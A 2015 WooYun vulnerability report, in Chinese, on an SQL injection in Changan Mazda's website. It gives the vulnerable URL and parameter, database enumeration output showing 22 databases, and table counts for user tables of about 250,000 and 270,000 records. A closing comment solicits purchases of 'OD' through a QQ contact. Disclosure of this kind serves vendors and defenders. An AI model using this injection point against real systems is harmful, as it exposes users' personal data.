当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142614

漏洞标题:长安马自达某处SQL注入(22库/52万用户新信息泄露)

相关厂商:长安马自达汽车有限公司

漏洞作者: wps2015

提交时间:2015-09-21 19:38

修复时间:2015-09-26 19:40

公开时间:2015-09-26 19:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-21: 细节已通知厂商并且等待厂商处理中
2015-09-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

SQL注入

详细说明:

注入点:http://www.changan-mazda.com.cn/market/runningmen/article.php?id=191

1.png


available databases [22]:
[*] aaa
[*] car
[*] car_bak
[*] changanmzd
[*] changanmzd2015
[*] chetie
[*] ct
[*] cx
[*] cx5
[*] cx5_2015
[*] cx5_818
[*] cx5wrzy
[*] information_schema
[*] market2015
[*] market_babaquna
[*] mazda
[*] mazda_yumatravel
[*] mazida
[*] mysql
[*] performance_schema
[*] test
[*] yumazu


car库:

Database: car
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| `user` | 259935 |
| user_bak | 187556 |
| message | 176399 |
| user_friends | 140072 |
| user_friends_view | 139864 |
| customers | 95419 |
| user_car | 73841 |
| user_feed | 64592 |
| photo | 60200 |
| guestbook | 47854 |
| guestbook_view | 47852 |
| blog | 37284 |
| user_gifts | 31795 |
| visitors | 30966 |
| party_users | 30713 |
| party_users_view | 30530 |
| blog_category | 23671 |
| drive_character | 19823 |
| user_car_bak | 18533 |
| comment | 16903 |
| topic_reply | 14358 |
| topic_reply_view | 14353 |
| blog_comment | 12364 |
| blog_comment_view | 12357 |
| act_users | 10969 |
| act_user_view | 10946 |
| user_act_view | 10575 |
| taskbuffers | 10541 |
| act_signer_view | 10467 |
| activity_signup | 10467 |
| activity_comment | 6663 |
| act_comment_view | 6658 |
| party_sign | 5312 |
| task_usertask | 5099 |
| usertask | 5098 |
| album_category | 4972 |
| album_view | 4972 |
| photo_comment | 3415 |
| photo_comment_view | 3413 |
| vote_options | 3084 |
| party_topic | 2933 |
| user_interests | 2323 |
| record | 2096 |
| answer | 1654 |
| answer_view | 1654 |
| question | 1233 |
| question_view | 1233 |
| baike_user | 1076 |
| baike_user_view | 1076 |
| event | 996 |
| activity | 964 |
| activity_view | 963 |
| vote_users | 957 |
| repaste | 903 |
| repaste_view | 903 |
| vote_comment | 645 |
| vote_comment_view | 644 |
| vote | 574 |
| homework_photoes | 534 |
| policy | 371 |
| homework_comment | 275 |
| homework_comment_view | 275 |
| party | 263 |
| party_view | 263 |
| party_apply | 185 |
| baike_comment | 182 |
| baike_comment_view | 182 |
| feedback | 137 |
| goods_users | 135 |
| homework | 89 |
| task | 54 |
| friends_category | 44 |
| baike | 33 |
| repaste_comment | 24 |
| repaste_comment_view | 24 |
| marklist | 23 |
| gift | 18 |
| question_category | 17 |
| flash_banner | 16 |
| party_topic_category | 11 |
| goods | 10 |
| activity_category | 7 |
| car_model | 6 |
| party_category | 5 |
| admin | 3 |
| baike_category | 2 |
| notice | 2 |
+---------------------------------------+---------+


user表中25万

2.png


Database: yumazu
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ymz_owner_certification | 571284 |
| ymz_common_member_grouppm | 416972 |
| ymz_ucenter_memberfields | 278748 |
| ymz_ucenter_members | 278748 |
| ymz_common_member_count | 277860 |
| ymz_common_member_field_forum | 277860 |
| ymz_common_member_field_home | 277860 |
| ymz_common_member_profile | 277860 |
| ymz_common_member_status | 277860 |
| ymz_common_member | 277858 |
| ymz_common_member_verify | 240800 |
| ymz_forum_post | 67031 |
| ymz_home_notification | 51050 |
| ymz_forum_threadpartake | 48302 |
| ymz_common_district | 45051 |
| ymz_forum_filter_post | 45001 |
| ymz_home_blog | 38755 |
| ymz_home_blogfield | 38755 |
| ymz_common_credit_rule_log | 37893 |
| ymz_forum_attachment | 23878 |
| ymz_common_word | 20914 |
| ymz_common_member_newprompt | 18654 |
| ymz_forum_statlog | 15310 |
| ymz_home_pic | 12807 |
| ymz_common_onlinetime | 11855 |
| ymz_forum_thread | 9483 |
| ymz_forum_threadmod | 7768 |
| ymz_forum_activityapply | 7419 |
| ymz_forum_sofa | 5021 |
| ymz_owner_uservin | 3939 |
| ymz_forum_attachment_unused | 3293 |
| ymz_forum_threadimage | 2787 |
| ymz_common_credit_rule_log_field | 2604 |
| ymz_forum_attachment_8 | 2384 |
| ymz_forum_attachment_1 | 2246 |
| ymz_forum_attachment_2 | 2199 |
| ymz_forum_attachment_9 | 2194 |
| ymz_forum_attachment_0 | 2154 |
| ymz_home_comment | 2101 |
| ymz_ucenter_pm_indexes | 2032 |
| ymz_forum_attachment_7 | 2028 |
| ymz_forum_attachment_6 | 1962 |
| ymz_forum_attachment_5 | 1896 |
| ymz_forum_attachment_3 | 1791 |
| ymz_forum_attachment_4 | 1696 |
| ymz_home_pokearchive | 1680 |
| ymz_owner_certification_bak140314 | 1322 |
| ymz_ucenter_pm_members | 1250 |
| ymz_home_visitor | 1206 |
| ymz_forum_activity | 1107 |
| ymz_common_member_crime | 1099 |
| ymz_forum_post_tableid | 921 |
| ymz_ucenter_notelist | 791 |
| ymz_forum_modwork | 668 |
| ymz_home_album | 656 |
| ymz_ucenter_pm_lists | 632 |
| ymz_common_tagitem | 562 |
| ymz_home_poke | 451 |
| ymz_common_setting | 438 |
| ymz_home_friend | 410 |
| ymz_home_doing | 406 |
| ymz_common_member_stat_field | 404 |
| ymz_home_feed | 316 |
| ymz_forum_rsscache | 312 |
| ymz_common_tag | 285 |
| ymz_ucenter_newpm | 235 |
| ymz_ucenter_pm_messages_4 | 233 |
| ymz_ucenter_pm_messages_5 | 233 |
| ymz_ucenter_pm_messages_6 | 230 |
| ymz_home_friend_request | 229 |
| ymz_ucenter_pm_messages_9 | 229 |
| ymz_common_session | 219 |
| ymz_ucenter_pm_messages_0 | 208 |
| ymz_home_friendlog | 207 |
| ymz_ucenter_pm_messages_8 | 201 |
| ymz_home_favorite | 186 |
| ymz_common_stylevar | 180 |
| ymz_ucenter_pm_messages_3 | 179 |
| ymz_ucenter_pm_messages_1 | 177 |
| ymz_ucenter_pm_messages_7 | 177 |
| ymz_common_block_item_data | 167 |
| ymz_ucenter_pm_messages_2 | 165 |
| ymz_forum_threaddisablepos | 163 |
| ymz_forum_newthread | 133 |
| ymz_forum_hotreply_member | 132 |
| ymz_common_syscache | 117 |
| ymz_home_share | 113 |
| ymz_common_admincp_perm | 111 |
| ymz_forum_hotreply_number | 110 |
| ymz_common_block_style | 103 |
| ymz_home_clickuser | 101 |
| ymz_forum_postcomment | 100 |
| ymz_forum_groupfield | 91 |
| ymz_forum_threadclass | 87 |
| ymz_common_block_pic | 85 |
| ymz_common_smiley | 85 |
| ymz_forum_spacecache | 82 |
| ymz_home_picfield | 74 |
| ymz_home_follow | 60 |
| ymz_common_member_verify_info | 58 |
| ymz_common_nav | 58 |
| ymz_common_member_profile_setting | 51 |
| ymz_forum_forumfield | 50 |
| ymz_forum_forum | 49 |
| ymz_common_block_item | 42 |
| ymz_common_credit_rule | 31 |
| ymz_common_member_action_log | 27 |
| ymz_common_seccheck | 26 |
| ymz_ucenter_settings | 26 |
| ymz_common_usergroup | 22 |
| ymz_common_usergroup_field | 22 |
| ymz_owner_toleadinfo | 22 |
| ymz_portal_article_content | 21 |
| ymz_portal_article_count | 21 |
| ymz_common_cron | 20 |
| ymz_forum_postcache | 19 |
| ymz_portal_article_title | 19 |
| ymz_portal_rsscache | 19 |
| ymz_common_pluginvar | 18 |
| ymz_common_stat | 16 |
| ymz_forum_groupuser | 16 |
| ymz_home_click | 15 |
| ymz_forum_polloption | 14 |
| ymz_common_cache | 13 |
| ymz_common_block | 12 |
| ymz_common_plugin | 12 |
| ymz_common_report | 12 |
| ymz_common_template_block | 12 |
| ymz_home_class | 12 |
| ymz_common_diy_data | 11 |
| ymz_common_failedip | 10 |
| ymz_forum_medal | 10 |
| ymz_gift | 10 |
| ymz_common_credit_log | 9 |
| ymz_common_credit_log_field | 9 |
| ymz_home_docomment | 8 |
| ymz_common_admingroup | 7 |
| ymz_forum_typeoption | 7 |
| ymz_common_admincp_group | 6 |
| ymz_forum_onlinelist | 6 |
| ymz_forum_pollvoter | 6 |
| ymz_forum_poststick | 5 |
| ymz_forum_promotion | 5 |
| ymz_common_admincp_cmenu | 4 |
| ymz_common_failedlogin | 4 |
| ymz_forum_bbcode | 4 |
| ymz_common_block_favorite | 3 |
| ymz_common_grouppm | 3 |
| ymz_common_member_secwhite | 3 |
| ymz_forum_grouplevel | 3 |
| ymz_forum_imagetype | 3 |
| ymz_forum_poll | 3 |
| ymz_gift_send | 3 |
| ymz_portal_category | 3 |
| ymz_ucenter_vars | 3 |
| ymz_common_admincp_member | 2 |
| ymz_common_searchindex | 2 |
| ymz_common_statuser | 2 |
| ymz_common_style | 2 |
| ymz_common_template | 2 |
| ymz_common_word_type | 2 |
| ymz_forum_threadprofile | 2 |
| ymz_forum_warning | 2 |
| ymz_gift_group | 2 |
| ymz_mobile_setting | 2 |
| ymz_portal_article_trash | 2 |
| ymz_portal_attachment | 2 |
| ymz_ucenter_failedlogins | 2 |
| ymz_common_admincp_session | 1 |
| ymz_common_advertisement | 1 |
| ymz_common_remote_port | 1 |
| ymz_gift_user | 1 |
| ymz_ucenter_admins | 1 |
| ymz_ucenter_badwords | 1 |
+---------------------------------------+---------+


ymz_ucenter_members 表27万

3.png


漏洞证明:

3.png

修复方案:

过滤

版权声明:转载请注明来源 wps2015@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-26 19:40

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-09-26 17:57 | 茫茫涯 ( 路人 | Rank:0 漏洞数:1 | 郑州工作,从事网络安全工作和程序设计)

    高价收购OD,有的联系QQ:1291806522